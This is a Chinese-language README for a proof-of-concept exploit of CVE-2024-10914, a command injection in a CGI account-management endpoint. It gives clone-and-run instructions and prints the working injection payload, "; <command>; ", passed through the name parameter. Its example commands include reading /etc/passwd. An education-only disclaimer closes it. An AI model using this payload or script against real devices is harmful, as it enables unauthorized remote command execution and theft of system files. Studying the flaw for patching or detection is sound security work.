针对 /cgi-bin/account_mgr.cgi 端点命令注入漏洞的利用程序。该漏洞允许通过未经过滤的参数在受影响系统上执行任意命令。
CVE-2024-10914 是一个命令注入漏洞,影响具有 CGI Web 接口的设备。易受攻击的应用程序未正确验证 cgi_user_add 请求中的 name 参数,允许攻击者注入系统命令,这些命令将以应用程序的权限执行。
克隆仓库并安装依赖:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
或手动安装:
pip install requests
脚本提供两个参数:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url(必需):目标 URL(例如:http://192.168.1.1)-c, --command(可选):要执行的命令(默认:id)执行命令 id:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
执行自定义命令:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
列出文件:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
该利用程序向易受攻击的端点发送带有以下 payload 的 GET 请求:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
空字符串被引号闭合,并注入所需命令,该命令在服务器上下文中执行。
脚本将显示:
此代码仅用于教育和安全研究目的。仅应在您拥有明确授权的系统上使用。未经授权使用此利用程序可能违反当地法律并构成犯罪。作者不对滥用此工具的行为负责。
SS3K
未指定